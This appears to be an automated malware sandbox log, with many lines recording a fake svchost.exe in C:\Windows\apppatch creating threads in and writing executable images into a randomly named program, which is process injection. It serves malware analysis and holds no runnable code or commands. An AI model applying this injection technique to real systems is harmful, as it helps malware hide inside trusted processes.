Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 27F1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: B21360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 28E1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 8A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2821360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: C91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2731360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2121360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 25B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2331360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 21D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2D91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2851360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2BE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2F31360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2B71360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2481360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2BE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2F11360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 531360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2F41360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 25B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 27D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F31360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2ED1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2981360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 21D1360Jump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtProtectVirtualMemory: Direct from: 0x77542F9C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtSetInformationProcess: Direct from: 0x77542C5C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtAllocateVirtualMemory: Direct from: 0x77542B9C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtAdjustPrivilegesToken: Direct from: 0x77542EAC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtSetTimerEx: Direct from: 0x77537B2E
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtCreateFile: Direct from: 0x77542FEC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtOpenFile: Direct from: 0x77542DCC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtSetInformationThread: Direct from: 0x77542ECC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtQueryInformationToken: Direct from: 0x77542CAC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtTerminateThread: Direct from: 0x77542FCC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtDeviceIoControlFile: Direct from: 0x77542AEC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtQueryValueKey: Direct from: 0x77542BEC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtOpenSection: Direct from: 0x77542E0C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtQuerySystemInformation: Direct from: 0x775448CC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtSetInformationThread: Direct from: 0x775363F9
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtSetInformationThread: Direct from: 0x77542B4C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtQueryAttributesFile: Direct from: 0x77542E6C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtAllocateVirtualMemory: Direct from: 0x77543C9C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtQueryInformationProcess: Direct from: 0x77542C26
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtAllocateVirtualMemory: Direct from: 0x77542BFC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtQuerySystemInformation: Direct from: 0x1C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtQuerySystemInformation: Direct from: 0x77542DFC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtResumeThread: Direct from: 0x775436AC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtUnmapViewOfSection: Direct from: 0x77542D3C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtNotifyChangeKey: Direct from: 0x77543C2C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtCreateMutant: Direct from: 0x775435CC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeNtMapViewOfSection: Direct from: 0x77542D1C
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 632000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1472000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A82000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2172000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: D92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3042000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D82000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2562000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2622000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 11E2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3132000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2EC2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 10B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 26F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2922000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2002000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2962000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2242000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3062000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1012000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28C2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2532000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2AA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3132000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2632000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29C2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27C2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: B22000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28E2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 8A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2822000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2732000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2122000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2332000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2852000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F32000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2B72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2482000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 532000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F42000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: F32000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2ED2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2982000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 630000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 631000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 632000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 685000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1470000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1471000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1472000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 14C5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2C35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D90000Jump to behavior
